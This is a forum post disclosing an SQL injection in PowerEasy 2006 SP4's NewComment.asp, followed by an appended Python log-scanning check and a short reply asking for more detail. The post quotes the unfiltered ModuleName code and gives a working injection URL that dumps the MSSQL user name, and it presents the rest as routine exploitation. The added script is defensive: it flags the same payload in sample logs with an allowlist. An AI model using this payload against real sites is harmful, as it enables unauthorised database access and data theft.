Exploiting the PowerEasy (动易) 2006 SP4 vulnerability
Today BCT published the PowerEasy SP4 vulnerability; since it is public anyway, I might as well post it.
In NewComment.asp, the line

    ModuleName = Trim(request("ModuleName"))

leaves the ModuleName variable unfiltered, so we can build our own SQL into the SQL statement below:

    If ModuleName <> "" Then
        If ChannelID <> 0 Then
            If ClassID <> 0 Then
                sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & ModuleName & " A on C.InfoID=A." & ModuleName & "ID where A.ChannelID= " & ChannelID & " and A.ClassID= " & ClassID & " and C.Passed =" & PE_True

    sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1+and+1=1

After A.ChannelID=1 we can append our own SQL statement. (Spaces are written as +.)

    NewComment.asp?num=1&ChannelID=1&ClassID=1&ModuleName=Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1%20and%20user>0--

For example, this dumps the MSSQL user name. The rest is ordinary SQL injection.
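Added example (not part of the original post, and not PowerEasy's own code): a Python check that mirrors the validation NewComment.asp lacks, an allowlist of module names, and runs it over constructed IIS-style log lines to flag requests whose ModuleName would not pass. The log field layout, the sample lines and the allowlist contents are assumptions.

```python
import re
from urllib.parse import parse_qs

# Module names the page legitimately joins on (PE_<ModuleName>). The post only
# shows "Article"; other site-specific names (an assumption) would go here.
# The point: ModuleName must come from a fixed set, never be concatenated raw.
ALLOWED_MODULE_NAMES = {"Article"}

# A table-name suffix should be a bare identifier: letters, digits, underscore.
IDENT_RE = re.compile(r"^[A-Za-z][A-Za-z0-9_]*$")


def module_name_is_safe(value: str) -> bool:
    """The check NewComment.asp should apply before building sqlComment."""
    return bool(IDENT_RE.match(value)) and value in ALLOWED_MODULE_NAMES


def suspicious_requests(log_lines):
    """Flag NewComment.asp requests whose ModuleName fails module_name_is_safe.

    Assumes W3C-style fields: date time c-ip cs-method cs-uri-stem cs-uri-query ...
    Returns a list of (line_number, decoded_module_name).
    """
    hits = []
    for number, line in enumerate(log_lines, 1):
        fields = line.split()
        if len(fields) < 6 or not fields[4].lower().endswith("/newcomment.asp"):
            continue
        if fields[5] == "-":  # no query string logged
            continue
        # parse_qs decodes %20 and '+' to spaces and splits each pair on its
        # first '=', so the injected comparison operators stay inside the value.
        params = {k.lower(): v for k, v in parse_qs(fields[5]).items()}
        for value in params.get("modulename", []):
            if not module_name_is_safe(value):
                hits.append((number, value))
    return hits


# Constructed sample log lines (not real traffic). Line 2 carries the request
# shape shown in the post above.
SAMPLE_LOG = [
    "2008-05-01 10:00:01 192.0.2.10 GET /NewComment.asp num=1&ChannelID=1&ClassID=1&ModuleName=Article 200",
    "2008-05-01 10:00:07 192.0.2.10 GET /NewComment.asp num=1&ChannelID=1&ClassID=1&ModuleName=Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1%20and%20user>0-- 200",
    "2008-05-01 10:00:09 192.0.2.11 GET /Default.asp - 200",
]

if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: unexpected ModuleName {value!r}")
```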
re: Exploiting the PowerEasy (动易) 2006 SP4 vulnerability
Boss, is there anything more detailed?

I already have this one myself.